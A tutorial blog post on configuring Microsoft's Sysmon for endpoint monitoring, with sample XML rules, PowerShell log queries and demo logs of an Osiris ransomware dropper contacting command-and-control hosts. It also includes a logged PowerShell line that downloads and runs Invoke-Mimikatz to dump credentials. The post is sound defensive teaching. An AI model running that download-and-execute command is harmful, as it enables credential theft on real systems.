Sysmon - The Best Free Windows Monitoring Tool You Aren't Using

What is Sysmon?

There's nothing better than a free tool that does a job beautifully, and it's hard to think of many tools that fit that description better than Sysmon. Sysmon is part of the excellent Sysinternals suite from Mark Russinovich and is built using the same monitoring mechanisms ProcMon uses. Sysmon however, is a Windows driver and service designed for continual, long-term, headless monitoring, and logs important chosen Windows events to the Windows log. It's a tool we discuss extensively in SANS SEC511, and for good reason, it's an outstanding way to gain endpoint visibility and record critical events that help you quickly reconstruct an intrusion timeline. It's non-intrusive, invisible to users, and when setup correctly, will cause no discernible performance impact. For all these reasons, I highly recommend you consider it for inclusion in your standard enterprise build, as well as run it on your personal computers. It's so easy to set up and provides such high value information, there's no reason not to install it.

When attackers get access to an endpoint, the incident response team's goal is to figure out what happened as quickly as possible to facilitate a rapid, accurate response. A correctly set up Sysmon install makes this a breeze as most of this information will have been recorded and easily available for your analysis. Here are some example use cases:

  • Log the file name, arguments, and executable hashes of all non-signed processes that were started
  • Log all modifications to the CurrentVersion\Run registry keys to identify when new items are added to autostart
  • Log the time, date, hash, and details of all newly installed drivers
  • Log all network connections on non-traditional network ports
  • Monitor the lsass.exe process to check for process injection (common for password dumping tools)

Sound useful? Let's discuss how to set this up.

Where to get it

At the time of writing, Sysmon V5 was just released, which includes new features for file creation and registry modification logging. This function will allow us to continuously monitor our endpoints for critical changes such as new autostart entry points, host file changes, executables dropped in temp folders, and other intrusion related changes.

Once you have Sysmon downloaded, installing it is as easy as c:\> sysmon64.exe -i, which will install the driver and service using default options. In specific, this will turn on logging for process creation/termination, registry modifications, and loading of drivers, it will NOT turn on image load logging, process access, and network connection logging due to potential performance impact. The defaults are useful and a great improvement over not having Sysmon, but fine-tuning the install to your specific setup is where the true power comes from, and to do this, you will need to create a custom XML rule file.

Basic Configuration

You can quickly set up Sysmon to monitor selected events with arguments on the command line.

  • -h [hash,...] = Specify which hash types to record. Use "*" for all or -h SHA256 to turn on SHA256 for example. Options are MD5, SHA1, SHA256, and IMPHASH.
  • -n [process,...] = Enable logging of network connections (potential performance hit). You can specify a single process by using a process name like -n firefox.exe,cmd.exe,powershell.exe
  • -l [process,...] = Enable logging of image loaded events (potential performance hit). You can specify a single process by using a process name like -l iexplore.exe,calc.exe

Note: If you use command line commands to turn on and off Sysmon, these options are NOT additive so you must specify all options you want at once. sysmon.exe -c -n firefox.exe -h SHA1 for example. Use sysmon -c -- to revert to default.

Advanced Configuration

Advanced rules for Sysmon are created in an easy to read XML format and I highly encourage you to configure Sysmon this way. A blank skeleton for a sysmon XML file would be the following:

<Sysmon schemaversion="3.20">
    <!-- Capture all hash types -->
    <HashAlgorithms>*</HashAlgorithms>
    <EventFiltering>
    ...conditions go here...
    </EventFiltering>
</Sysmon>

The conditions you specify control what will and will not be recorded. You explicitly define lists of "filter tags" you are interested in by using the "include" and "exclude" directives, and based on this, everything else will corresponding logged or not. You're essentially making a sort of whitelist/blacklist of conditions that will be logged. For example, if you want to log only drivers that are not signed by "Microsoft Windows" or contain the word "synaptics" (all comparisons are case insensitive), you could use the DriverLoad filter tag with a Signature condition shown below in your setup.

<DriverLoad onmatch="exclude">
    <Signature condition="is">Microsoft Windows</Signature>
    <Signature condition="contains">synaptics</Signature>
</DriverLoad>

A similar rule to include logging traffic to port 80, IP 1.2.3.4, or to Kerberos ports only would look like this. 

<NetworkConnect onmatch="include">
    <DestinationPort condition="is">80</DestinationPort>
    <DestinationIp condition="is">1.2.3.4</DestinationIp>
    <DestionationPortName condition="is">kerberos</DestionationPortName>
</NetworkConnect>

Pretty easy right? The challenge mainly lies in knowing what conditions and event filters are available, and crafting items that will be meaningful to your organization and incident response teams. Available event filter tags are below, notice DriverLoad and NetworkConnect from the previous examples.

ID  Tag                    Event
1   ProcessCreate          Process Create
2   FileCreateTime         File creation time
3   NetworkConnect         Network connection detected
5   ProcessTerminate       Process terminated
6   DriverLoad             Driver Loaded
7   ImageLoad              Image loaded
8   CreateRemoteThread     CreateRemoteThread detected
9   RawAccessRead          RawAccessRead detected
10  ProcessAccess          Process accessed
11  FileCreate             File created
12  RegistryEvent          Registry object added or deleted
13  RegistryEvent          Registry value set
14  RegistryEvent          Registry object renamed
15  FileCreateStreamHash   File stream created

There are a lot of options here, and each major version of Sysmon has brought additional filter tags to try out, so keep an eye out for upgrades. Also, note that you will need to update the schema version number in your XML file to allow the new filter tags to work.

Conditions available for comparison are:

is          Default, values are equals.
is not      Values are different.
contains    The field contains this value.
excludes    The field does not contain this value.
begin with  The field begins with this value.
end with    The field ends with this value.
less than   Lexicographical comparison is less than zero.
more than   Lexicographical comparison is more than zero.
image       Match an image path (full path or only image name).
            For example: lsass.exe will match c:\windows\system32\lsass.exe.
Example Configuration

An example basic configuration for Sysmon is listed below. It attempts to filter out some of the ports you might not be interested in seeing output from, and turns on recording for all file creation events. In reality, you probably would want to limit recording of registry and file events to specific areas since there is an immense amount of activity during normal Windows use, and recording it all will severely limit the length of your Sysmon log file.

<Sysmon schemaversion="3.20">
    <!-- Capture all hashes -->
    <HashAlgorithms>*</HashAlgorithms>
    <EventFiltering>   
        <!-- EventID == 1 Log all processes starting  -->
        <ProcessCreate onmatch="exclude" />

        <!-- EventID == 2 Do not log file creation time changes  -->
        <FileCreateTime onmatch="include" />

        <!-- EventID == 3 Log only selected network connections (careful - potential performance issues)  -->
        <NetworkConnect onmatch="exclude">
            <Image condition="contains">firefox.exe</Image>
            <DestinationIp condition="is">127.0.0.1</DestinationIp>
            <DestinationPortName condition="is">llmnr</DestinationPortName>
            <DestinationPortName condition="is">ldap</DestinationPortName>
            <DestinationPortName condition="is">kerberos</DestinationPortName>
        </NetworkConnect>

        <!-- EventID == 5 Log process termination -->
        <ProcessTerminate onmatch="exclude" />

        <!-- EventID == 6 Log all drivers loading except Microsoft and Windows signed ones-->
        <DriverLoad onmatch="exclude">
            <Signature condition="contains">microsoft</Signature>
            <Signature condition="contains">windows</Signature>
        </DriverLoad>

        <!-- EventID == 7 Do not log image loading (careful - potential performance issues) -->
        <ImageLoad onmatch="include" />

        <!-- EventID == 8 Only log remote thread creation for winlogon and lsass -->
        <CreateRemoteThread onmatch="include">
             <TargetImage condition="image">lsass.exe</TargetImage>
             <TargetImage condition="image">winlogon.exe</TargetImage>
        </CreateRemoteThread>

        <!-- EventID == 9 Do not log raw disk access (caused event flooding with certain disk encryption drivers)  -->
        <RawAccessRead onmatch="include" />

        <!-- EventID == 10 Do not log process access -->
        <ProcessAccess onmatch="include" />

        <!-- EventID == 11 Log all file creation -->
        <FileCreate onmatch="exclude" />

        <!-- EventID == 12-14 Do not log registry object added or deleted -->
        <RegistryEvent onmatch="include" />

        <!-- EventID == 15 Do not file stream created-->
        <FileCreateStreamHash onmatch="include" />
    </EventFiltering>
</Sysmon>
Interpreting output

With this type of setup, here's an example of the Windows Sysmon log output you would get when a new process is created.

Process Create:
UtcTime: 2016-11-24 13:13:57.386
ProcessGuid: {e29500a3-e795-5836-0000-0010fa920f00}
ProcessId: 3764
Image: C:\Windows\System32\calc.exe
CommandLine: "C:\Windows\system32\calc.exe" 
CurrentDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\
User: WIN-4M6JEQRPH70\IEUser
LogonGuid: {e29500a3-e6ab-5836-0000-00207a590100}
LogonId: 0x1597a
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=7BF8F58D8D8D5DEDCEE34185622A4B64702EFB8E,MD5=4884DA7754823B44CCC2B2106F21146E,SHA256=20F7530727FF461DE43AF16A42D60F12CD5C79A808E8DBEB8AB98159BD325ECE,IMPHASH=F93B5D76132F6E6068946EC238813CE1
ParentProcessGuid: {e29500a3-e6ab-5836-0000-0010857d0100}
ParentProcessId: 1352
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE

Some items to note

  • All of these line items can be used as words for filters in your XML statements, so you could limit matches by Image, User, or IntegrityLevel for example.
  • I've selected to only collect the SHA1 hash here, you can record all types Sysmon is capable of by using a * in the <HashAlgorithms> tag.
  • LogonGuid is a globally unique number that will allow you to correlate all events that correspond to this particular process (see demo later on). This is a deterministically derived number that compensates for the fact that LogonID and ProcessId is not necessarily unique across time.
  • PowerShell (admin required) is one of the easiest ways to view and filter these logs: Get-WinEvent -FilterHashTable @{LogName="Microsoft-Windows-Sysmon/Operational";id=1,3} | Out-Gridview would show all type 1 and 3 events (ProcessCreate and NetworkConnect items) for example. You can get even fancier and use -FilterXPath or -FilterHashTable to pull out just selected fields like the Image or Hashes info. This command will give you a list of unique process names that have been recorded. get-winevent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "*[System[Task=3]]" | %{$_.Properties[3].Value} | sort -Unique
  • If you forget an option, use sysmon.exe -? config to show the current schema version.
Osiris Ransomware Demo

I pulled the spam attachment of the day (md5=260927aaae3470eab03b072d77268c60) , from hybrid-analysis.com and ran it on a virtual machine with Sysmon enabled to show the power of this tool. This malware happens to be a .js file that drops the Osiris ransomware. I don't even really need to investigate what the virus did because the Windows logs speak for themselves.

First, the initial running of the malware from the desktop, which would be typical since this is designed to be double clicked by a user after a download.

Process Create:
UtcTime: 2016-12-11 15:58:06.435
ProcessGuid: {e29500a3-778e-584d-0000-0010fb549e00}
ProcessId: 2400
Image: C:\Windows\System32\wscript.exe
CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\Desktop\malware.js" 
CurrentDirectory: C:\Users\IEUser\Desktop\
User: WIN-4M6JEQRPH70\IEUser
LogonGuid: {e29500a3-e6ab-5836-0000-00207a590100}
LogonId: 0x1597a
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=860265276B29B42B8C4B077E5C651DEF9C81B6E9,MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0,IMPHASH=62EA1D2DA2B1481E969D080A6B29D775
ParentProcessGuid: {e29500a3-e6ab-5836-0000-0010857d0100}
ParentProcessId: 1352
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE

We can follow this through the logs by using the ProcessGuid of the process that starts the malware. PS C:\Windows\system32> get-winevent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational";} -oldest | Where-Object {$_.message -like "*{e29500a3-778e-584d-0000-0010fb549e00}*"} | fl

Some files are dropped in the Temp folder:

TimeCreated  : 12/11/2016 10:58:06 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:58:06.996
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\WScript.exe
               TargetFilename: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W8N
               S2AMB\o48qpgndy[1].txt
               CreationUtcTime: 2016-12-11 15:58:06.996

TimeCreated  : 12/11/2016 10:58:07 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:58:07.605
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\WScript.exe
               TargetFilename: C:\Users\IEUser\AppData\Local\Temp\GPt3ly2wE
               CreationUtcTime: 2016-12-11 15:58:07.605

Command and control domain is contacted via HTTP (vxhcf-31.srv.cat), probably for the 2nd stage executable (GPt3ly2wE.zk) since .js files are typically just a dropper:

TimeCreated  : 12/11/2016 10:58:07 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               UtcTime: 2016-11-25 06:00:48.931
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\wscript.exe
               User: WIN-4M6JEQRPH70\IEUser
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.87.141
               SourceHostname: WIN-4M6JEQRPH70.localdomain
               SourcePort: 49562
               SourcePortName: 
               DestinationIsIpv6: false
               DestinationIp: 134.0.11.154
               DestinationHostname: vxhcf-31.srv.cat
               DestinationPort: 80
               DestinationPortName: http

TimeCreated  : 12/11/2016 10:58:08 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:58:08.182
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\WScript.exe
               TargetFilename: C:\Users\IEUser\AppData\Local\Temp\GPt3ly2wE.zk
               CreationUtcTime: 2016-12-11 15:58:08.182

The file GPt3ly2wE.zk is run using rundll32.exe - which means it is probably the main encryption binary in DLL form. We now must follow the new ProcessGuid to make sure we get all the details of the new child process.

TimeCreated  : 12/11/2016 10:58:08 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               UtcTime: 2016-12-11 15:58:08.213
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               CommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\IEUser\AppData\Local\Temp\GPT3LY~1.ZK,f7
               CurrentDirectory: C:\Users\IEUser\Desktop\
               User: WIN-4M6JEQRPH70\IEUser
               LogonGuid: {E29500A3-E6AB-5836-0000-00207A590100}
               LogonId: 0x1597a
               TerminalSessionId: 1
               IntegrityLevel: Medium
               Hashes: SHA1=8939CF35447B22DD2C6E6F443446ACC1BF986D58,MD5=51138BEEA3E2C21EC44D0932C71762A8,SHA256=5AD3C3
               7E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124,IMPHASH=EF8A44FE2F9AD4AB85E55004AAA024A9
               ParentProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ParentProcessId: 2400
               ParentImage: C:\Windows\System32\wscript.exe
               ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\Desktop\malware.js" 

TimeCreated  : 12/11/2016 10:58:08 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 5
Message      : Process terminated:
               UtcTime: 2016-12-11 15:58:08.244
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\wscript.exe

Using the same PowerShell Get-WinEvent search command with a Process Guid of {e29500a3-7790-584d-0000-001000679e00} shows additional action, here are some selected items:

A new command and control domain is contacted (213.ip-51-254-141.eu), probably for the encryption key transfer:

TimeCreated  : 12/11/2016 10:58:13 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               UtcTime: 2016-11-25 06:00:53.506
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               User: WIN-4M6JEQRPH70\IEUser
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.87.141
               SourceHostname: WIN-4M6JEQRPH70.localdomain
               SourcePort: 49563
               SourcePortName: 
               DestinationIsIpv6: false
               DestinationIp: 51.254.141.213
               DestinationHostname: 213.ip-51-254-141.eu
               DestinationPort: 80
               DestinationPortName: http

The HTML message file saying "you've been encrypted" is written to various places on disk and the process ends:

TimeCreated  : 12/11/2016 10:59:11 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:59:11.050
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               TargetFilename: C:\Users\IEUser\Desktop\OSIRIS-79f4.htm
               CreationUtcTime: 2016-12-11 15:59:11.050

TimeCreated  : 12/11/2016 10:59:11 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:59:11.050
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               TargetFilename: C:\ProgramData\Adobe\Updater6\4CR5T3SP--GUA7--EEHF--5050A725--CABDC0DA17C9.osiris
               CreationUtcTime: 2016-12-11 15:59:11.050

TimeCreated  : 12/11/2016 10:59:11 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:59:11.253
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               TargetFilename: C:\Users\IEUser\Downloads\OSIRIS-5ade.htm
               CreationUtcTime: 2016-12-11 15:59:11.253

TimeCreated  : 12/11/2016 10:59:14 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 5
Message      : Process terminated:
               UtcTime: 2016-12-11 15:59:14.285
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe

Pretty easy to spot, right? Consider how much faster your incident response team would be with this type of info at their fingertips, and for free!

Mimikatz

Here's another quick scenario, what happens when you run something like Invoke-Mimikatz with the setup above? A nice command line record of what was entered, that's what.

Process Create:
UtcTime: 2016-12-08 14:26:06.171
ProcessGuid: {6b166207-6d7e-5849-0000-0010fd880e00}
ProcessId: 3344
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell  "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
CurrentDirectory: c:\Users\IEUser\Downloads\Sysmon\
User: IE11WIN7\IEUser
LogonGuid: {6b166207-69e8-5849-0000-00201d710100}
LogonId: 0x1711d
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D
ParentProcessGuid: {6b166207-69fe-5849-0000-0010d2ff0200}
ParentProcessId: 2680
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"

There you have it, some extremely valuable malware IOCs, provided and recorded automatically by a basic Sysmon config!

Now that you've seen Sysmon in action, consider what rules and conditions you might want to write to create a good signal to noise ratio in your Sysmon log. Take the basic file above, modify it for your needs, and give it a test drive for a week or so. If all goes well, consider what it would take to get it deployed across your whole environment, and don't forget to have the logs automatically sent somewhere for alerting at any suspicious changes!